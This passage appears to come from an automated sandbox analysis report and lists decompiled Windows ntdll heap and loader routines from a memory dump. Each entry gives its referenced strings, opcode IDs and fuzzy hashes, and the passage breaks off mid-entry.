                    								if( *(_t108 + 0xc) == 0) {
                    									_push("HEAP: ");
                    									E00FDB150();
                    								} else {
                    									E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    								}
                    								_push(E0107D455(_t181,  *(_t182 - 0x28)));
                    								_push( *(_t182 + 8));
                    								E00FDB150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
                    								goto L34;
                    							} else {
                    								__eflags =  *(_t104 + 0xc);
                    								if( *(_t104 + 0xc) == 0) {
                    									_push("HEAP: ");
                    									E00FDB150();
                    								} else {
                    									E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    								}
                    								_push( *(_t182 + 8));
                    								E00FDB150("Just allocated block at %p for %Ix bytes\n",  *0x10c6360);
                    								L34:
                    								_t112 =  *[fs:0x30];
                    								__eflags =  *((char*)(_t112 + 2));
                    								if( *((char*)(_t112 + 2)) != 0) {
                    									 *0x10c6378 = 1;
                    									 *0x10c60c0 = 0;
                    									asm("int3");
                    									 *0x10c6378 = 0;
                    								}
                    								goto L49;
                    							}
                    						}
                    					}
                    				} else {
                    					_t181 =  *0x10c5708; // 0x0
                    					 *0x10cb1e0(__ecx, __edx,  *(_t182 + 8));
                    					 *_t181();
                    					L50:
                    					return E0102D130(0, _t177, _t181);
                    				}
                    			}

                    Disassembly address column only (0x01092d82 through 0x010930c1, with 0x00000000 marking unresolved branch targets); the instruction text for these addresses is absent from the page.

                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                    • API String ID: 0-1745908468
                    • Opcode ID: 2d395a1e164cd45c93c3e98bcb53125fd985771b780a7f0f39e2819561ea4860
                    • Instruction ID: aa1e5369e37e4bf4514e0330afe26ef0e49cf8f8f06e8ffcfbde9d61fb20e29b
                    • Opcode Fuzzy Hash: 2d395a1e164cd45c93c3e98bcb53125fd985771b780a7f0f39e2819561ea4860
                    • Instruction Fuzzy Hash: AB91CE31500641EFDF22DF68C865AADBBF2BF89710F18805DF585AB392C73A9941EB01
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    • Kernel-MUI-Number-Allowed, xrefs: 00FE3D8C
                    • Kernel-MUI-Language-Disallowed, xrefs: 00FE3E97
                    • WindowsExcludedProcs, xrefs: 00FE3D6F
                    • Kernel-MUI-Language-Allowed, xrefs: 00FE3DC0
                    • Kernel-MUI-Language-SKU, xrefs: 00FE3F70
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                    • API String ID: 0-258546922
                    • Opcode ID: e3dd4f549cc56982b0c7a5d235401962898c6715e814f2479d2f6e1023d1bd38
                    • Instruction ID: 9c5e0dae7a493bfc54ffeebdc16f4cc45b41edee1427c9878bb3ec8a2551d986
                    • Opcode Fuzzy Hash: e3dd4f549cc56982b0c7a5d235401962898c6715e814f2479d2f6e1023d1bd38
                    • Instruction Fuzzy Hash: BEF17B72D00259EFCB11DF99C984AEEBBB9FF48750F1441AAE505E7251D734AE00EBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                    • API String ID: 0-188067316
                    • Opcode ID: 545dc955dfbe82e75d40c05a7a816925b379ba1967284d0b9b0d1b5e2fff4e06
                    • Instruction ID: 13995e2c14d09bc4d4118a52332fd0709b1415f30fbc948cbf25883a4e892d44
                    • Opcode Fuzzy Hash: 545dc955dfbe82e75d40c05a7a816925b379ba1967284d0b9b0d1b5e2fff4e06
                    • Instruction Fuzzy Hash: 6C012832109241DED22A9B69E81EF9277F8DB81B30F1D806EF00497796CFAD9440EA11
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    • HEAP: , xrefs: 010422E6, 010423F6
                    • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 010422F3
                    • HEAP[%wZ]: , xrefs: 010422D7, 010423E7
                    • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01042403
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                    • API String ID: 0-1657114761
                    • Opcode ID: 501a617089cff69741f9831d9356d4de7b266fc2f357550431ec79dddacae3cb
                    • Instruction ID: 182b054e0c33e5c2da4a5c6b242c366f2b12b3787ee63f2e1cbe148ced47bc1a
                    • Opcode Fuzzy Hash: 501a617089cff69741f9831d9356d4de7b266fc2f357550431ec79dddacae3cb
                    • Instruction Fuzzy Hash: 56D1F4B0A00209DFDB29CF28C4907BAB7F1FF48310F158169E99A9B355E374E845EB52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                    • API String ID: 2994545307-2586055223
                    • Opcode ID: 31e7db8cdf1b79c7d300b232e20d52570a39229b626ce20bc4db89dc6552a4f8
                    • Instruction ID: f1491240e9f149b7c23bf3a15faf0a5210aefdea1281a0b2475ebf5df8e6fecf
                    • Opcode Fuzzy Hash: 31e7db8cdf1b79c7d300b232e20d52570a39229b626ce20bc4db89dc6552a4f8
                    • Instruction Fuzzy Hash: B451F6B23046859FD712EB68CC45F7777E9EF84B10F1904A8FA958B2A2D734E840D762
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    • Querying the active activation context failed with status 0x%08lx, xrefs: 01049357
                    • minkernel\ntdll\ldrsnap.c, xrefs: 0104933B, 01049367
                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0104932A
                    • LdrpFindDllActivationContext, xrefs: 01049331, 0104935D
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                    • API String ID: 0-3779518884
                    • Opcode ID: 434a0139c6398939785ac1e4b8081f309d8c6b39de31bbcc8d2e6ed737981f33
                    • Instruction ID: 04daf241ba1c5a33ed428ef2bbad971964c94eb2825118e2a3908e16484cc131
                    • Opcode Fuzzy Hash: 434a0139c6398939785ac1e4b8081f309d8c6b39de31bbcc8d2e6ed737981f33
                    • Instruction Fuzzy Hash: A341D731E003959FFB77AB1C8889A7A76E4BB05358F05C1BBE9C4571D2E774AD808781
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                    • API String ID: 2994545307-336120773
                    • Opcode ID: 5a0dc1d7540e58f39262058263b18514500ab89de7ba35bd70cef50ff3524a2f
                    • Instruction ID: 05ecbe6fa3b4bd49d528f079847e3bcd30cc43b3fa7c40ebf1dbb2be330e43ea
                    • Opcode Fuzzy Hash: 5a0dc1d7540e58f39262058263b18514500ab89de7ba35bd70cef50ff3524a2f
                    • Instruction Fuzzy Hash: F1314431200100EFDB21DB58C9A9FAB77E9FF04720F19419AF485DB2A1D778E841EB69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                    • API String ID: 0-3178619729
                    • Opcode ID: 85b9b39e4019a85317540404d8f69000d7a776e0a3de2b5615da64884a78fb3c
                    • Instruction ID: b632fb6e83a7e4bcf74ca3ccfeaced21ba176cf9d70425576f929e22a4d168e4
                    • Opcode Fuzzy Hash: 85b9b39e4019a85317540404d8f69000d7a776e0a3de2b5615da64884a78fb3c
                    • Instruction Fuzzy Hash: A82225B0600205DFEB25CF28C895BBABBF5EF44704F1885ADE5858B356D779E881CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                    • API String ID: 0-4253913091
                    • Opcode ID: ebf42e2a214a599d851761db74989cb86861b0203ec412075ee6683bd08b4cce
                    • Instruction ID: 02b2a2e68353d21396f8d786634823dc107df9b56d9185813a0054c27541f07c
                    • Opcode Fuzzy Hash: ebf42e2a214a599d851761db74989cb86861b0203ec412075ee6683bd08b4cce
                    • Instruction Fuzzy Hash: 1CE19B71B0020ADFDB19DF68D894BBAB7B5FF44304F2881A9E5429B3A1D734E941DB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01039C18
                    • minkernel\ntdll\ldrsnap.c, xrefs: 01039C28
                    • LdrpDoPostSnapWork, xrefs: 01039C1E
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                    • API String ID: 2994545307-1948996284
                    • Opcode ID: 08ad88ea8a83b2fb47bb0d1f3353df54dd782f790af6894ec78fa0313c6bbf9b
                    • Instruction ID: 0a8306dfb661583f97a6a42fe70486e6a184bf241f2651c1ad3b8efb3dc4a01c
                    • Opcode Fuzzy Hash: 08ad88ea8a83b2fb47bb0d1f3353df54dd782f790af6894ec78fa0313c6bbf9b
                    • Instruction Fuzzy Hash: 6D911431E0025ADFDF18EF5AC881ABA73B5FF84354B544169EC49AB141DB30EE02EB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0104A0CD
                    • HEAP: , xrefs: 0104A0BA
                    • HEAP[%wZ]: , xrefs: 0104A0AD
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                    • API String ID: 0-1340214556
                    • Opcode ID: 33b709ce38b1d1adb1c39281133922d23882a30f0ca6cb0ea907bdc0fb264e17
                    • Instruction ID: a461d0670ca01679c21baf65b07cab2c8d8da9fa9915fe44f2110457aea3082e
                    • Opcode Fuzzy Hash: 33b709ce38b1d1adb1c39281133922d23882a30f0ca6cb0ea907bdc0fb264e17
                    • Instruction Fuzzy Hash: 9F81C371344784EFE727DB68C894FAABBF8EF08714F0441A5E5928B692D778E940DB10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                    • API String ID: 0-1334570610
                    • Opcode ID: 0658c11645ccf308f44c8446ef284d2d650f9017be0dbab2496a0ec933974e4d
                    • Instruction ID: 2985f05f7af2a6e8c4888a6f4572e9602d5d1f4230d908d04cf16c475131f8c1
                    • Opcode Fuzzy Hash: 0658c11645ccf308f44c8446ef284d2d650f9017be0dbab2496a0ec933974e4d
                    • Instruction Fuzzy Hash: F761F571A00209DFDB18DF24C485B7ABBE5FF84314F24856EE9498F261D734E882EB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    • minkernel\ntdll\ldrmap.c, xrefs: 010398A2
                    • LdrpCompleteMapModule, xrefs: 01039898
                    • Could not validate the crypto signature for DLL %wZ, xrefs: 01039891
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                    • API String ID: 0-1676968949
                    • Opcode ID: 40bc724e19e0d462e821e649d3674cc5f7afda365b2809d892d35fcf4eda6aa4
                    • Instruction ID: 1a9e7492753c0b6b08b1622dd925922978568df104e60b76b92e170c2310ac74
                    • Opcode Fuzzy Hash: 40bc724e19e0d462e821e649d3674cc5f7afda365b2809d892d35fcf4eda6aa4
                    • Instruction Fuzzy Hash: FD510331A08785DBE721EF5DC844B6ABBE4EF80724F140595E9919B3D1C774ED00EB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    • Heap block at %p modified at %p past requested size of %Ix, xrefs: 0108256F
                    • HEAP: , xrefs: 0108255C
                    • HEAP[%wZ]: , xrefs: 0108254F
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                    • API String ID: 0-3815128232
                    • Opcode ID: c5c40b2231f576d30bcdfe466fcde2f17545c758b554a823d96e57a042b0f144
                    • Instruction ID: 3faa08984bd6cda9838cf6127c07c108a4aabac0338e08756f344c39fdee7889
                    • Opcode Fuzzy Hash: c5c40b2231f576d30bcdfe466fcde2f17545c758b554a823d96e57a042b0f144
                    • Instruction Fuzzy Hash: D1511634108250CEE3B5EF1EC8547767BF1EB44744F55889AE9C28B285DA3AD847DB31
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00FDE68C
                    • @, xrefs: 00FDE6C0
                    • InstallLanguageFallback, xrefs: 00FDE6DB
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                    • API String ID: 0-1757540487
                    • Opcode ID: e7f61d340506b0388cee6939d356bfbf652fd51b0613940232fcd06c902b3aae
                    • Instruction ID: 63509863e2c23ac42ef7d35cca428e64f2b1063d8b1a8e196f42925befb06bed
                    • Opcode Fuzzy Hash: e7f61d340506b0388cee6939d356bfbf652fd51b0613940232fcd06c902b3aae
                    • Instruction Fuzzy Hash: F551B3726043459BD754DF24C840AABB3E8BF88718F05096EF995D7250FB34D904D7A2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                    • API String ID: 0-2558761708
                    • Opcode ID: 205a0f36c21593c6141043897acc30b8aa005f472dcaa8ea4bc806606f071ccb
                    • Instruction ID: 3bd0743774260a685120a7cf52b74937a6c4a0bd1b56523dc4dbe671c5afcc3f
                    • Opcode Fuzzy Hash: 205a0f36c21593c6141043897acc30b8aa005f472dcaa8ea4bc806606f071ccb
                    • Instruction Fuzzy Hash: 0F11D33170410A9FDB29DB15C895B35B3AAEF80721F29812EF24ACB365D7B4D841FB45
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: `$`
                    • API String ID: 0-197956300
                    • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                    • Instruction ID: b6c1a438dbf5dee5dbaae4631bfb2b0428e3fe248152ed4b7c2654f21ed3555e
                    • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                    • Instruction Fuzzy Hash: 8B91CF312043429FEB64CE29C851B5BBBE5BF88714F14896DF6D9CB280E774E904DB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID: Legacy$UEFI
                    • API String ID: 2994545307-634100481
                    • Opcode ID: 208b64a003f2621cf78bb788cee6972270112995080e15147faf4e281953319c
                    • Instruction ID: 60dc2d45e9cd6c4165df807220a6fec2ad784d6c48793080f0fa9b0bf071f130
                    • Opcode Fuzzy Hash: 208b64a003f2621cf78bb788cee6972270112995080e15147faf4e281953319c
                    • Instruction Fuzzy Hash: E9515E71A006099FDB54DFA9CC50AAEBBF4FF48740F14806DEA89EB252D7719940CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: _vswprintf_s
                    • String ID:
                    • API String ID: 677850445-0
                    • Opcode ID: 37a1e937428dce4f965e1373515b179136dc0bb4ca7d8fa6bbc072b44747c974
                    • Instruction ID: bb187c1c6cd820aaac2ac6aac6263cc88b4a927cef0c960f22188244b55d0189
                    • Opcode Fuzzy Hash: 37a1e937428dce4f965e1373515b179136dc0bb4ca7d8fa6bbc072b44747c974
                    • Instruction Fuzzy Hash: B151E171D0025A8EDB32CF68C844BAEBBF5BF85710F2041AED899EB282D7754945CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FFB9A5
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID:
                    • API String ID: 885266447-0
                    • Opcode ID: f0e636f3c05fcc20fcc8f2f16ad5cd2e2b8905c3cdebabc1fd06e035dfe8334d
                    • Instruction ID: ce26e579fae05d8213f95804f70e9369006722d0aa13ffaaa3ec418f79cb68fb
                    • Opcode Fuzzy Hash: f0e636f3c05fcc20fcc8f2f16ad5cd2e2b8905c3cdebabc1fd06e035dfe8334d
                    • Instruction Fuzzy Hash: 49515B71A08349CFC720DF28C48092ABBE5BF88710F14896EFA8587364D775EC40DB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: PATH
                    • API String ID: 0-1036084923
                    • Opcode ID: 2b192ee70f00a65816bf375ddfb21aae1d66be1eba028a6bb7b2e31c8a4fd935
                    • Instruction ID: c02d3fa85f2e493c8909c4aa31d91d8fa08ff0dda9f13524189d1105a4dda60e
                    • Opcode Fuzzy Hash: 2b192ee70f00a65816bf375ddfb21aae1d66be1eba028a6bb7b2e31c8a4fd935
                    • Instruction Fuzzy Hash: 0BC18FB1D00219DFEB26DF99D885AFDBBB5FF48740F144029E585AB290D738A941CF60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0104BE0F
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                    • API String ID: 0-865735534
                    • Opcode ID: fe98c2ee6f09b977fe2896a5d3e4939474907dc5f34a38ef5a2a4d3c7d70d415
                    • Instruction ID: 47c06ccf40ecdeb5e6e2d505d2f9d3b352282d8528c0b47a754f7c2d6cb3151b
                    • Opcode Fuzzy Hash: fe98c2ee6f09b977fe2896a5d3e4939474907dc5f34a38ef5a2a4d3c7d70d415
                    • Instruction Fuzzy Hash: 35A1E571B006078BE776DB69C891B7AB7E5AF44710F0445B9E986CB6C1DB34D801DB40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: RTL: Re-Waiting
                    • API String ID: 0-316354757
                    • Opcode ID: bc9061861f22fc1ddfb80703a0c2243a4c21788d15c7e7cbb60697cb24ca2189
                    • Instruction ID: 052e6ce46954808fee4d31695a8451447b96dd64b06613919ce7c91f6b32714f
                    • Opcode Fuzzy Hash: bc9061861f22fc1ddfb80703a0c2243a4c21788d15c7e7cbb60697cb24ca2189
                    • Instruction Fuzzy Hash: 4E614571A006569FDB72DB68C840BBEB7F6EF54760F2806AAE991973C1C7349D00A7C1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: `
                    • API String ID: 0-2679148245
                    • Opcode ID: 7629fc638dc7728a310832cc94ed9c3563e6fa329cade89433d9d88ca946a95d
                    • Instruction ID: 742a30f7472462cdb6c4ba11d1ce1ac04b09f0f7486f48cc162d6f527b9d3821
                    • Opcode Fuzzy Hash: 7629fc638dc7728a310832cc94ed9c3563e6fa329cade89433d9d88ca946a95d
                    • Instruction Fuzzy Hash: 9551CB703083428FE324DF68D984F6BBBE9EB84714F44496CFAD697290D671E805CB62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: @
                    • API String ID: 0-2766056989
                    • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                    • Instruction ID: dddd91ebb1ff038cc2c5a1127ac9402f0203cda0c1ad6eaa67850bbe4207eccf
                    • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                    • Instruction Fuzzy Hash: A9519D71504711AFD321DF29C841AABBBF8FF48710F00892EFA95976A0E7B4E914CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: BinaryHash
                    • API String ID: 0-2202222882
                    • Opcode ID: cdaf8efcb8a0ca742340a348bba2c0eae77e00dcf461f1c06875f290f7bcb250
                    • Instruction ID: cca81e834d0aa4652429be880cf515cccb48efd0aa2334fd1d71db5373450d2c
                    • Opcode Fuzzy Hash: cdaf8efcb8a0ca742340a348bba2c0eae77e00dcf461f1c06875f290f7bcb250
                    • Instruction Fuzzy Hash: 684154F2D0052D9BDB61DA50CC80FEFB77CAB44754F0085A5EA49AB240DB359E888FA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: `
                    • API String ID: 0-2679148245
                    • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                    • Instruction ID: 3c4ecdc78f6fdc80f6781662aa65e0453f1b16e3392f1f4e5a836071ce4b294a
                    • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                    • Instruction Fuzzy Hash: 6731133270430AABE720DE68CD44F9B7BD9FB88758F144228FA84DB284D770E904CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: BinaryName
                    • API String ID: 0-215506332
                    • Opcode ID: 31c9bd7ad730ec22a8dbb2d76e3e167d2ef115dd102c1ac241613aa676e63bb8
                    • Instruction ID: 2aa362050bccfc6f71b541213973423753092f640262bc5896d63739375fe598
                    • Opcode Fuzzy Hash: 31c9bd7ad730ec22a8dbb2d76e3e167d2ef115dd102c1ac241613aa676e63bb8
                    • Instruction Fuzzy Hash: 5B3105B290060AAFEB56DA58C945DBFFBB4FF80B60F014169ED84AB251D7319E00C7A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: @
                    • API String ID: 0-2766056989
                    • Opcode ID: 86dcea531cefc1a5ad84caf7bbe01a4984adbf454f7c690e83f351d2169c725c
                    • Instruction ID: f9e4bdd53dabf0d7eee0c897eaa970ac8ccf250e52f5130f2a0b31743a848f65
                    • Opcode Fuzzy Hash: 86dcea531cefc1a5ad84caf7bbe01a4984adbf454f7c690e83f351d2169c725c
                    • Instruction Fuzzy Hash: 7A31B3B15083059FD352DFA8C8809AFBBE8EF85754F00492EF9D483290D635DD04CBA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: WindowsExcludedProcs
                    • API String ID: 0-3583428290
                    • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                    • Instruction ID: 6f57821f41cefd21e10bd470a84fbfde56a87d8c575e10c227617ee4ab459e10
                    • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                    • Instruction Fuzzy Hash: 5721257BA41668EBDB219A5F8940FEBB7ADBF81720F250061FA44CB200D634DD00E7A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: Actx
                    • API String ID: 0-89312691
                    • Opcode ID: ebc1fca2dcf54782982ed879b77e7da528d151221af2563351629a51de675be7
                    • Instruction ID: 061fd2d97d2976bbf6fff668ad85acc277dbbc82aff60b0497da3a50d31d6d74
                    • Opcode Fuzzy Hash: ebc1fca2dcf54782982ed879b77e7da528d151221af2563351629a51de675be7
                    • Instruction Fuzzy Hash: D511D037B0460A8BEB246E1D8490736F295AF95B34F38453AE661DB3B1DA70DC09B340
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    • Critical error detected %lx, xrefs: 01088E21
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: Critical error detected %lx
                    • API String ID: 0-802127002
                    • Opcode ID: 258ed7718e1ee04e441496dee760f11e61d299de65a59db361082d5b472695f5
